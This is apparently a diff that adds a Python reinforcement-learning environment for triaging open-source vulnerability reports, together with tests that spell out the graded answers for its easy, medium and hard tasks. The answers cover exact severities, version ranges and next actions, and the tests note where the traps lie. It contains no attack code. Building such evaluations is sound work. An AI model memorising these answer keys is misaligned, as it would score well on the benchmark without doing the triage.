from .cases import CASE_DEFINITIONS, SEEDS, TASK_ORDER, CaseDefinition, choose_balanced_task_id, get_case_definition
|
| 14 |
+
from .graders import grade_case, normalize_text
|
| 15 |
+
except ImportError:
|
| 16 |
+
from models import EvidenceItem, TriageDraft, VulnTriageAction, VulnTriageObservation, VulnTriageState
|
| 17 |
+
from server.cases import CASE_DEFINITIONS, SEEDS, TASK_ORDER, CaseDefinition, choose_balanced_task_id, get_case_definition
|
| 18 |
+
from server.graders import grade_case, normalize_text
|
| 19 |
+
|
| 20 |
+
|
| 21 |
+
FIELD_TO_ATTR = {
|
| 22 |
+
"set_validity": "validity",
|
| 23 |
+
"set_affected_package": "affected_package",
|
| 24 |
+
"set_affected_versions": "affected_versions",
|
| 25 |
+
"set_severity": "severity",
|
| 26 |
+
"set_exploitability": "exploitability",
|
| 27 |
+
"set_next_action": "next_action",
|
| 28 |
+
}
|
| 29 |
+
|
| 30 |
+
|
| 31 |
+
class VulnTriageEnvironment(Environment):
|
| 32 |
+
"""Deterministic multi-step environment for OSS vulnerability triage."""
|
| 33 |
+
|
| 34 |
+
SUPPORTS_CONCURRENT_SESSIONS: bool = True
|
| 35 |
+
|
| 36 |
+
def __init__(self):
|
| 37 |
+
self._case: CaseDefinition = CASE_DEFINITIONS[TASK_ORDER[0]]
|
| 38 |
+
self._rng = random.Random(0)
|
| 39 |
+
self._revealed_evidence_ids: List[str] = []
|
| 40 |
+
self._draft = TriageDraft()
|
| 41 |
+
self._action_history: List[str] = []
|
| 42 |
+
self._submitted = False
|
| 43 |
+
self._score_breakdown: Dict[str, float] = {}
|
| 44 |
+
self._state = VulnTriageState(
|
| 45 |
+
episode_id=str(uuid4()),
|
| 46 |
+
step_count=0,
|
| 47 |
+
task_id=self._case.task_id,
|
| 48 |
+
difficulty=self._case.difficulty,
|
| 49 |
+
draft=self._draft,
|
| 50 |
+
revealed_evidence_ids=[],
|
| 51 |
+
action_history=[],
|
| 52 |
+
steps_remaining=self._case.max_steps,
|
| 53 |
+
submitted=False,
|
| 54 |
+
final_score=None,
|
| 55 |
+
score_breakdown={},
|
| 56 |
+
)
|
| 57 |
+
|
| 58 |
+
def reset(
|
| 59 |
+
self,
|
| 60 |
+
seed: Optional[int] = None,
|
| 61 |
+
episode_id: Optional[str] = None,
|
| 62 |
+
task_id: Optional[str] = None,
|
| 63 |
+
**_: object,
|
| 64 |
+
) -> VulnTriageObservation:
|
| 65 |
+
if task_id:
|
| 66 |
+
self._case = get_case_definition(task_id)
|
| 67 |
+
else:
|
| 68 |
+
selected_task_id = choose_balanced_task_id(seed, self._rng)
|
| 69 |
+
self._case = get_case_definition(selected_task_id)
|
| 70 |
+
|
| 71 |
+
self._revealed_evidence_ids = []
|
| 72 |
+
self._draft = TriageDraft()
|
| 73 |
+
self._action_history = []
|
| 74 |
+
self._submitted = False
|
| 75 |
+
self._score_breakdown = grade_case(self._case, self._draft)
|
| 76 |
+
self._state = VulnTriageState(
|
| 77 |
+
episode_id=episode_id or str(uuid4()),
|
| 78 |
+
step_count=0,
|
| 79 |
+
task_id=self._case.task_id,
|
| 80 |
+
difficulty=self._case.difficulty,
|
| 81 |
+
draft=self._draft.model_copy(deep=True),
|
| 82 |
+
revealed_evidence_ids=[],
|
| 83 |
+
action_history=[],
|
| 84 |
+
steps_remaining=self._case.max_steps,
|
| 85 |
+
submitted=False,
|
| 86 |
+
final_score=None,
|
| 87 |
+
score_breakdown=self._score_breakdown,
|
| 88 |
+
)
|
| 89 |
+
return self._observation(reward=0.0)
|
| 90 |
+
|
| 91 |
+
def step(
|
| 92 |
+
self,
|
| 93 |
+
action: VulnTriageAction,
|
| 94 |
+
timeout_s: Optional[float] = None,
|
| 95 |
+
**_: object,
|
| 96 |
+
) -> VulnTriageObservation:
|
| 97 |
+
del timeout_s
|
| 98 |
+
if self._submitted:
|
| 99 |
+
return self._observation(
|
| 100 |
+
reward=-0.05,
|
| 101 |
+
done=True,
|
| 102 |
+
metadata={"error": "episode_already_submitted"},
|
| 103 |
+
)
|
| 104 |
+
|
| 105 |
+
self._state.step_count += 1
|
| 106 |
+
reward = -0.005
|
| 107 |
+
note = action.action_type
|
| 108 |
+
|
| 109 |
+
if action.action_type == "read_report":
|
| 110 |
+
reward += 0.03 if not any(h.startswith("read_report") for h in self._action_history) else -0.02
|
| 111 |
+
note = "read_report"
|
| 112 |
+
elif action.action_type == "search_nvd_database":
|
| 113 |
+
reward += self._handle_nvd_search(action)
|
| 114 |
+
note = f"search_nvd_database:{action.value or ''}"
|
| 115 |
+
elif action.action_type == "fetch_commit_diff":
|
| 116 |
+
reward += self._handle_commit_fetch(action)
|
| 117 |
+
note = f"fetch_commit_diff:{action.value or ''}"
|
| 118 |
+
elif action.action_type == "message_maintainer":
|
| 119 |
+
reward += self._handle_message_maintainer(action)
|
| 120 |
+
note = f"message_maintainer:{action.value or ''}"
|
| 121 |
+
elif action.action_type == "inspect_evidence":
|
| 122 |
+
reward += self._handle_inspect(action)
|
| 123 |
+
note = f"inspect_evidence:{action.evidence_id or ''}"
|
| 124 |
+
elif action.action_type in FIELD_TO_ATTR:
|
| 125 |
+
reward += self._handle_field_update(action)
|
| 126 |
+
note = f"{action.action_type}:{action.value or ''}"
|
| 127 |
+
elif action.action_type in {"set_missing_information", "request_more_info"}:
|
| 128 |
+
reward += self._handle_missing_info(action)
|
| 129 |
+
note = f"{action.action_type}:{action.value or ''}"
|
| 130 |
+
elif action.action_type == "submit_triage":
|
| 131 |
+
return self._handle_submit(action)
|
| 132 |
+
else:
|
| 133 |
+
reward -= 0.05
|
| 134 |
+
note = f"invalid_action:{action.action_type}"
|
| 135 |
+
|
| 136 |
+
self._action_history.append(note)
|
| 137 |
+
self._score_breakdown = grade_case(self._case, self._draft)
|
| 138 |
+
self._sync_state()
|
| 139 |
+
|
| 140 |
+
if self._state.steps_remaining == 0:
|
| 141 |
+
timeout_penalty = max(self._score_breakdown["total"] - 0.1, 0.0)
|
| 142 |
+
self._submitted = True
|
| 143 |
+
self._state.submitted = True
|
| 144 |
+
self._state.final_score = round(timeout_penalty, 4)
|
| 145 |
+
return self._observation(
|
| 146 |
+
reward=round(timeout_penalty, 4),
|
| 147 |
+
done=True,
|
| 148 |
+
final_score=round(timeout_penalty, 4),
|
| 149 |
+
metadata={"termination_reason": "step_budget_exhausted"},
|
| 150 |
+
)
|
| 151 |
+
|
| 152 |
+
return self._observation(reward=round(reward, 4))
|
| 153 |
+
|
| 154 |
+
def _handle_nvd_search(self, action: VulnTriageAction) -> float:
|
| 155 |
+
query = (action.value or "").strip().lower()
|
| 156 |
+
if not query:
|
| 157 |
+
return -0.05
|
| 158 |
+
# The query should match one of the aliases in the seed fallback to return the nvd_assessment
|
| 159 |
+
seed = SEEDS[self._case.task_id]
|
| 160 |
+
snapshot_aliases = [normalize_text(a) for a in seed.fallback_snapshot.get("aliases", [])]
|
| 161 |
+
|
| 162 |
+
# We assume nvd_assessment handles the real data. If they searched a decoy CVE, we should
|
| 163 |
+
# conceptually return the decoy data. For simplicity, we just check if it matches the real CVE.
|
| 164 |
+
if normalize_text(query) in snapshot_aliases or query == normalize_text(seed.osv_id):
|
| 165 |
+
if "nvd_assessment" not in self._revealed_evidence_ids:
|
| 166 |
+
self._revealed_evidence_ids.append("nvd_assessment")
|
| 167 |
+
return 0.08
|
| 168 |
+
return -0.04
|
| 169 |
+
|
| 170 |
+
def _handle_commit_fetch(self, action: VulnTriageAction) -> float:
|
| 171 |
+
query = (action.value or "").strip()
|
| 172 |
+
if not query:
|
| 173 |
+
return -0.05
|
| 174 |
+
# If there's a github_commit_diff evidence piece, we check if the query is in the title "GitHub Commit <hash>"
|
| 175 |
+
for item in self._case.evidence:
|
| 176 |
+
if item["evidence_id"] == "github_commit_diff":
|
| 177 |
+
if query.lower() in item["title"].lower():
|
| 178 |
+
if "github_commit_diff" not in self._revealed_evidence_ids:
|
| 179 |
+
self._revealed_evidence_ids.append("github_commit_diff")
|
| 180 |
+
return 0.08
|
| 181 |
+
return -0.04
|
| 182 |
+
|
| 183 |
+
def _handle_message_maintainer(self, action: VulnTriageAction) -> float:
|
| 184 |
+
msg = (action.value or "").strip()
|
| 185 |
+
if len(msg) < 5:
|
| 186 |
+
return -0.05 # Need a real message
|
| 187 |
+
|
| 188 |
+
# When sending a message to maintainer, we return the vendor_status evidence if it exists
|
| 189 |
+
has_vendor_evidence = False
|
| 190 |
+
for item in self._case.evidence:
|
| 191 |
+
if item["evidence_id"] == "vendor_status":
|
| 192 |
+
if "vendor_status" not in self._revealed_evidence_ids:
|
| 193 |
+
self._revealed_evidence_ids.append("vendor_status")
|
| 194 |
+
has_vendor_evidence = True
|
| 195 |
+
break
|
| 196 |
+
|
| 197 |
+
return 0.08 if has_vendor_evidence else -0.02
|
| 198 |
+
|
| 199 |
+
def _handle_inspect(self, action: VulnTriageAction) -> float:
|
| 200 |
+
evidence_id = action.evidence_id or ""
|
| 201 |
+
all_ids = {item["evidence_id"] for item in self._case.evidence}
|
| 202 |
+
if evidence_id not in all_ids:
|
| 203 |
+
return -0.06
|
| 204 |
+
|
| 205 |
+
# Trap: Model cannot inspect interactive evidence directly as if it was static JSON
|
| 206 |
+
if evidence_id in {"nvd_assessment", "github_commit_diff", "vendor_status"}:
|
| 207 |
+
return -0.05
|
| 208 |
+
|
| 209 |
+
if evidence_id in self._revealed_evidence_ids:
|
| 210 |
+
return -0.02
|
| 211 |
+
|
| 212 |
+
self._revealed_evidence_ids.append(evidence_id)
|
| 213 |
+
if evidence_id in self._case.truth.supporting_evidence_ids:
|
| 214 |
+
return 0.06
|
| 215 |
+
return 0.02
|
| 216 |
+
|
| 217 |
+
def _handle_field_update(self, action: VulnTriageAction) -> float:
|
| 218 |
+
attr = FIELD_TO_ATTR[action.action_type]
|
| 219 |
+
new_value = (action.value or "").strip()
|
| 220 |
+
if not new_value:
|
| 221 |
+
return -0.04
|
| 222 |
+
|
| 223 |
+
current_value = getattr(self._draft, attr)
|
| 224 |
+
if normalize_text(current_value) == normalize_text(new_value):
|
| 225 |
+
return -0.01
|
| 226 |
+
|
| 227 |
+
setattr(self._draft, attr, new_value)
|
| 228 |
+
expected_value = getattr(self._case.truth, attr)
|
| 229 |
+
if normalize_text(new_value) == normalize_text(expected_value):
|
| 230 |
+
return 0.08
|
| 231 |
+
return -0.03
|
| 232 |
+
|
| 233 |
+
def _handle_missing_info(self, action: VulnTriageAction) -> float:
|
| 234 |
+
value = (action.value or "").strip()
|
| 235 |
+
if not value:
|
| 236 |
+
return -0.04
|
| 237 |
+
|
| 238 |
+
normalized_existing = {normalize_text(item) for item in self._draft.missing_information}
|
| 239 |
+
if normalize_text(value) not in normalized_existing:
|
| 240 |
+
self._draft.missing_information.append(value)
|
| 241 |
+
|
| 242 |
+
required = {normalize_text(item) for item in self._case.truth.missing_information}
|
| 243 |
+
if normalize_text(value) in required:
|
| 244 |
+
return 0.06
|
| 245 |
+
if action.action_type == "request_more_info" and self._case.truth.next_action == "request_info":
|
| 246 |
+
return 0.02
|
| 247 |
+
return -0.02
|
| 248 |
+
|
| 249 |
+
def _handle_submit(self, action: VulnTriageAction) -> VulnTriageObservation:
|
| 250 |
+
del action
|
| 251 |
+
self._submitted = True
|
| 252 |
+
breakdown = grade_case(self._case, self._draft)
|
| 253 |
+
final_score = breakdown["total"]
|
| 254 |
+
if len(self._revealed_evidence_ids) < max(2, len(self._case.truth.supporting_evidence_ids) // 2):
|
| 255 |
+
final_score = max(0.0, round(final_score - 0.1, 4))
|
| 256 |
+
|
| 257 |
+
self._action_history.append("submit_triage")
|
| 258 |
+
self._score_breakdown = {**breakdown, "total": final_score}
|
| 259 |
+
self._state.submitted = True
|
| 260 |
+
self._state.final_score = final_score
|
| 261 |
+
self._sync_state()
|
| 262 |
+
return self._observation(
|
| 263 |
+
reward=final_score,
|
| 264 |
+
done=True,
|
| 265 |
+
final_score=final_score,
|
| 266 |
+
metadata={"termination_reason": "submitted"},
|
| 267 |
+
)
|
| 268 |
+
|
| 269 |
+
def _sync_state(self) -> None:
|
| 270 |
+
self._state.task_id = self._case.task_id
|
| 271 |
+
self._state.difficulty = self._case.difficulty
|
| 272 |
+
self._state.draft = self._draft.model_copy(deep=True)
|
| 273 |
+
self._state.revealed_evidence_ids = list(self._revealed_evidence_ids)
|
| 274 |
+
self._state.action_history = list(self._action_history)
|
| 275 |
+
self._state.steps_remaining = max(self._case.max_steps - self._state.step_count, 0)
|
| 276 |
+
self._state.score_breakdown = dict(self._score_breakdown)
|
| 277 |
+
|
| 278 |
+
def _observation(
|
| 279 |
+
self,
|
| 280 |
+
reward: float,
|
| 281 |
+
done: bool = False,
|
| 282 |
+
final_score: Optional[float] = None,
|
| 283 |
+
metadata: Optional[Dict[str, object]] = None,
|
| 284 |
+
) -> VulnTriageObservation:
|
| 285 |
+
self._sync_state()
|
| 286 |
+
visible_evidence = [
|
| 287 |
+
EvidenceItem.model_validate(item)
|
| 288 |
+
for item in self._case.evidence
|
| 289 |
+
if item["evidence_id"] in self._revealed_evidence_ids
|
| 290 |
+
]
|
| 291 |
+
return VulnTriageObservation(
|
| 292 |
+
task_id=self._case.task_id,
|
| 293 |
+
difficulty=self._case.difficulty,
|
| 294 |
+
objective=self._case.objective,
|
| 295 |
+
report_summary=self._case.report_summary,
|
| 296 |
+
visible_evidence=visible_evidence,
|
| 297 |
+
available_evidence=[
|
| 298 |
+
item["evidence_id"]
|
| 299 |
+
for item in self._case.evidence
|
| 300 |
+
if item["evidence_id"] not in self._revealed_evidence_ids
|
| 301 |
+
],
|
| 302 |
+
draft=self._draft.model_copy(deep=True),
|
| 303 |
+
action_history=list(self._action_history),
|
| 304 |
+
steps_remaining=max(self._case.max_steps - self._state.step_count, 0),
|
| 305 |
+
score_breakdown=dict(self._score_breakdown),
|
| 306 |
+
final_score=final_score,
|
| 307 |
+
done=done,
|
| 308 |
+
reward=reward,
|
| 309 |
+
metadata=metadata or {},
|
| 310 |
+
)
|
| 311 |
+
|
| 312 |
+
@property
|
| 313 |
+
def state(self) -> VulnTriageState:
|
| 314 |
+
self._sync_state()
|
| 315 |
+
return self._state
|
tests/test_environment.py
ADDED
|
@@ -0,0 +1,220 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import random
|
| 2 |
+
|
| 3 |
+
from models import TriageDraft, VulnTriageAction
|
| 4 |
+
from server.cases import choose_balanced_task_id, CASE_DEFINITIONS
|
| 5 |
+
from server.graders import grade_task, version_range_match
|
| 6 |
+
from server.vuln_triage_env_environment import VulnTriageEnvironment
|
| 7 |
+
|
| 8 |
+
|
| 9 |
+
# ---------------------------------------------------------------------------
|
| 10 |
+
# Core environment tests
|
| 11 |
+
# ---------------------------------------------------------------------------
|
| 12 |
+
|
| 13 |
+
def test_easy_task_can_be_solved_deterministically():
|
| 14 |
+
"""Easy task should be solvable in 10 steps with just 2 evidence reads."""
|
| 15 |
+
env = VulnTriageEnvironment()
|
| 16 |
+
env.reset(task_id="task_easy_guarddog")
|
| 17 |
+
env.step(VulnTriageAction(action_type="read_report"))
|
| 18 |
+
env.step(VulnTriageAction(action_type="inspect_evidence", evidence_id="osv_advisory"))
|
| 19 |
+
env.step(VulnTriageAction(action_type="inspect_evidence", evidence_id="affected_versions"))
|
| 20 |
+
env.step(VulnTriageAction(action_type="set_validity", value="valid"))
|
| 21 |
+
env.step(VulnTriageAction(action_type="set_affected_package", value="guarddog"))
|
| 22 |
+
env.step(VulnTriageAction(action_type="set_affected_versions", value="<0.1.5"))
|
| 23 |
+
env.step(VulnTriageAction(action_type="set_severity", value="medium"))
|
| 24 |
+
env.step(VulnTriageAction(action_type="set_exploitability", value="low"))
|
| 25 |
+
env.step(VulnTriageAction(action_type="set_next_action", value="patch"))
|
| 26 |
+
result = env.step(VulnTriageAction(action_type="submit_triage"))
|
| 27 |
+
assert result.done is True
|
| 28 |
+
assert result.final_score == 1.0
|
| 29 |
+
|
| 30 |
+
|
| 31 |
+
def test_medium_task_uses_real_provider_backed_truth():
|
| 32 |
+
env = VulnTriageEnvironment()
|
| 33 |
+
env.reset(task_id="task_medium_invenio")
|
| 34 |
+
env.step(VulnTriageAction(action_type="set_validity", value="valid"))
|
| 35 |
+
env.step(VulnTriageAction(action_type="set_affected_package", value="invenio-records"))
|
| 36 |
+
breakdown = grade_task("task_medium_invenio", env.state.draft)
|
| 37 |
+
assert breakdown["validity"] == 1.0
|
| 38 |
+
assert breakdown["affected_package"] == 1.0
|
| 39 |
+
|
| 40 |
+
|
| 41 |
+
def test_balanced_sampler_is_seed_reproducible():
|
| 42 |
+
first = choose_balanced_task_id(7, random.Random(0))
|
| 43 |
+
second = choose_balanced_task_id(7, random.Random(999))
|
| 44 |
+
assert first == second
|
| 45 |
+
|
| 46 |
+
|
| 47 |
+
def test_environment_reset_without_task_id_samples_valid_difficulties():
|
| 48 |
+
env = VulnTriageEnvironment()
|
| 49 |
+
seen = {env.reset().difficulty for _ in range(12)}
|
| 50 |
+
assert seen == {"easy", "medium", "hard"}
|
| 51 |
+
|
| 52 |
+
|
| 53 |
+
# ---------------------------------------------------------------------------
|
| 54 |
+
# Fix 1: version range normalizer accepts equivalent expressions
|
| 55 |
+
# ---------------------------------------------------------------------------
|
| 56 |
+
|
| 57 |
+
def test_version_range_match_accepts_trivial_lower_bound():
|
| 58 |
+
assert version_range_match(">=0,<0.1.5", "<0.1.5") == 1.0
|
| 59 |
+
assert version_range_match(">=0.0.0,<0.1.5", "<0.1.5") == 1.0
|
| 60 |
+
|
| 61 |
+
|
| 62 |
+
def test_version_range_match_is_order_insensitive_for_segments():
|
| 63 |
+
a = "<1.0.2 ; >=1.1.0,<1.1.1 ; >=1.2.0,<1.2.2"
|
| 64 |
+
b = ">=1.2.0,<1.2.2 ; >=1.1.0,<1.1.1 ; <1.0.2"
|
| 65 |
+
assert version_range_match(a, b) == 1.0
|
| 66 |
+
|
| 67 |
+
|
| 68 |
+
def test_version_range_match_different_ranges_score_zero():
|
| 69 |
+
assert version_range_match("<0.1.4", "<0.1.5") == 0.0
|
| 70 |
+
|
| 71 |
+
|
| 72 |
+
# ---------------------------------------------------------------------------
|
| 73 |
+
# Fix 2: multi-branch affected versions captured correctly
|
| 74 |
+
# ---------------------------------------------------------------------------
|
| 75 |
+
|
| 76 |
+
def test_medium_invenio_ground_truth_includes_all_branches():
|
| 77 |
+
truth = CASE_DEFINITIONS["task_medium_invenio"].truth
|
| 78 |
+
assert "<1.0.2" in truth.affected_versions
|
| 79 |
+
assert ">=1.1.0,<1.1.1" in truth.affected_versions
|
| 80 |
+
assert ">=1.2.0,<1.2.2" in truth.affected_versions
|
| 81 |
+
|
| 82 |
+
|
| 83 |
+
def test_medium_invenio_all_branches_score_full_points():
|
| 84 |
+
draft = TriageDraft(
|
| 85 |
+
validity="valid",
|
| 86 |
+
affected_package="invenio-records",
|
| 87 |
+
affected_versions=">=1.2.0,<1.2.2 ; >=1.1.0,<1.1.1 ; <1.0.2",
|
| 88 |
+
severity="medium",
|
| 89 |
+
exploitability="low",
|
| 90 |
+
next_action="publish_advisory",
|
| 91 |
+
)
|
| 92 |
+
breakdown = grade_task("task_medium_invenio", draft)
|
| 93 |
+
assert breakdown["affected_versions"] == 1.0
|
| 94 |
+
|
| 95 |
+
|
| 96 |
+
# ---------------------------------------------------------------------------
|
| 97 |
+
# Difficulty redesign — Easy task
|
| 98 |
+
# ---------------------------------------------------------------------------
|
| 99 |
+
|
| 100 |
+
def test_easy_task_only_needs_two_evidence_items():
|
| 101 |
+
"""Easy task supporting_evidence_ids should be just 2 items, not 4."""
|
| 102 |
+
truth = CASE_DEFINITIONS["task_easy_guarddog"].truth
|
| 103 |
+
assert truth.supporting_evidence_ids == ["osv_advisory", "affected_versions"]
|
| 104 |
+
assert len(truth.supporting_evidence_ids) == 2
|
| 105 |
+
|
| 106 |
+
|
| 107 |
+
def test_easy_task_max_steps_is_tight():
|
| 108 |
+
assert CASE_DEFINITIONS["task_easy_guarddog"].max_steps == 10
|
| 109 |
+
|
| 110 |
+
|
| 111 |
+
# ---------------------------------------------------------------------------
|
| 112 |
+
# Difficulty redesign — Medium task
|
| 113 |
+
# ---------------------------------------------------------------------------
|
| 114 |
+
|
| 115 |
+
def test_medium_task_has_threat_intel_evidence():
|
| 116 |
+
"""Medium task should inject a threat_intel_signal evidence item."""
|
| 117 |
+
evidence_ids = [e["evidence_id"] for e in CASE_DEFINITIONS["task_medium_invenio"].evidence]
|
| 118 |
+
assert "threat_intel_signal" in evidence_ids
|
| 119 |
+
|
| 120 |
+
|
| 121 |
+
def test_medium_task_exploitability_is_medium_not_low():
|
| 122 |
+
"""EPSS says low but threat intel overrides to medium — key difficulty driver."""
|
| 123 |
+
truth = CASE_DEFINITIONS["task_medium_invenio"].truth
|
| 124 |
+
assert truth.exploitability == "medium", (
|
| 125 |
+
"Medium task exploitability must be 'medium' (overriding EPSS) "
|
| 126 |
+
"so any model that only reads the EPSS evidence gets it wrong."
|
| 127 |
+
)
|
| 128 |
+
|
| 129 |
+
|
| 130 |
+
def test_medium_task_exploitability_costs_points_if_epss_only():
|
| 131 |
+
"""A model that reads only EPSS and submits 'low' exploitability loses points."""
|
| 132 |
+
draft = TriageDraft(
|
| 133 |
+
validity="valid",
|
| 134 |
+
affected_package="invenio-records",
|
| 135 |
+
affected_versions="<1.0.2 ; >=1.1.0,<1.1.1 ; >=1.2.0,<1.2.2",
|
| 136 |
+
severity="medium",
|
| 137 |
+
exploitability="low", # wrong — EPSS-only answer
|
| 138 |
+
next_action="publish_advisory",
|
| 139 |
+
)
|
| 140 |
+
breakdown = grade_task("task_medium_invenio", draft)
|
| 141 |
+
assert breakdown["exploitability"] == 0.0
|
| 142 |
+
assert breakdown["total"] < 1.0
|
| 143 |
+
|
| 144 |
+
|
| 145 |
+
# ---------------------------------------------------------------------------
|
| 146 |
+
# Difficulty redesign — Hard task
|
| 147 |
+
# ---------------------------------------------------------------------------
|
| 148 |
+
|
| 149 |
+
def test_hard_task_correct_next_action_is_request_info():
|
| 150 |
+
"""Hard task must require request_info, not publish_advisory."""
|
| 151 |
+
truth = CASE_DEFINITIONS["task_hard_gradio"].truth
|
| 152 |
+
assert truth.next_action == "request_info", (
|
| 153 |
+
"Hard task next_action must be 'request_info' — no patch exists yet."
|
| 154 |
+
)
|
| 155 |
+
|
| 156 |
+
|
| 157 |
+
def test_hard_task_has_vendor_status_evidence():
|
| 158 |
+
"""Hard task should inject a vendor_status evidence item explaining no patch."""
|
| 159 |
+
evidence_ids = [e["evidence_id"] for e in CASE_DEFINITIONS["task_hard_gradio"].evidence]
|
| 160 |
+
assert "vendor_status" in evidence_ids
|
| 161 |
+
|
| 162 |
+
|
| 163 |
+
def test_hard_task_affected_versions_covers_all():
|
| 164 |
+
"""Hard task affected_versions must be >=0 (no fixed version)."""
|
| 165 |
+
truth = CASE_DEFINITIONS["task_hard_gradio"].truth
|
| 166 |
+
assert truth.affected_versions == ">=0"
|
| 167 |
+
|
| 168 |
+
|
| 169 |
+
def test_hard_task_publish_advisory_costs_next_action_points():
|
| 170 |
+
"""A model that naively publishes instead of requesting info loses 15%."""
|
| 171 |
+
truth = CASE_DEFINITIONS["task_hard_gradio"].truth
|
| 172 |
+
draft = TriageDraft(
|
| 173 |
+
validity="valid",
|
| 174 |
+
affected_package="gradio",
|
| 175 |
+
affected_versions=">=0",
|
| 176 |
+
severity="medium",
|
| 177 |
+
exploitability="low",
|
| 178 |
+
next_action="publish_advisory", # wrong — no patch exists
|
| 179 |
+
missing_information=list(truth.missing_information),
|
| 180 |
+
)
|
| 181 |
+
breakdown = grade_task("task_hard_gradio", draft)
|
| 182 |
+
assert breakdown["next_action"] == 0.0
|
| 183 |
+
assert breakdown["total"] < 1.0
|
| 184 |
+
|
| 185 |
+
|
| 186 |
+
def test_hard_task_request_info_scores_full():
|
| 187 |
+
"""The correct hard-task answer should score 1.0."""
|
| 188 |
+
truth = CASE_DEFINITIONS["task_hard_gradio"].truth
|
| 189 |
+
draft = TriageDraft(
|
| 190 |
+
validity=truth.validity,
|
| 191 |
+
affected_package=truth.affected_package,
|
| 192 |
+
affected_versions=truth.affected_versions,
|
| 193 |
+
severity=truth.severity,
|
| 194 |
+
exploitability=truth.exploitability,
|
| 195 |
+
next_action="request_info",
|
| 196 |
+
missing_information=list(truth.missing_information),
|
| 197 |
+
)
|
| 198 |
+
breakdown = grade_task("task_hard_gradio", draft)
|
| 199 |
+
assert breakdown["next_action"] == 1.0
|
| 200 |
+
assert breakdown["total"] == 1.0
|
| 201 |
+
|
| 202 |
+
|
| 203 |
+
def test_hard_task_has_non_empty_missing_information():
|
| 204 |
+
truth = CASE_DEFINITIONS["task_hard_gradio"].truth
|
| 205 |
+
assert len(truth.missing_information) >= 3
|
| 206 |
+
|
| 207 |
+
|
| 208 |
+
def test_hard_task_empty_missing_info_costs_points():
|
| 209 |
+
draft = TriageDraft(
|
| 210 |
+
validity="valid",
|
| 211 |
+
affected_package="gradio",
|
| 212 |
+
affected_versions=">=0",
|
| 213 |
+
severity="medium",
|
| 214 |
+
exploitability="low",
|
| 215 |
+
next_action="request_info",
|
| 216 |
+
missing_information=[],
|
| 217 |
+
)
|
| 218 |
+
breakdown = grade_task("task_hard_gradio", draft)
|
| 219 |
+
assert breakdown["missing_information"] == 0.0
|
| 220 |
+
assert breakdown["total"] < 1.0
|
uv.lock
ADDED
|
The diff for this file is too large to render.
See raw diff
|
|
|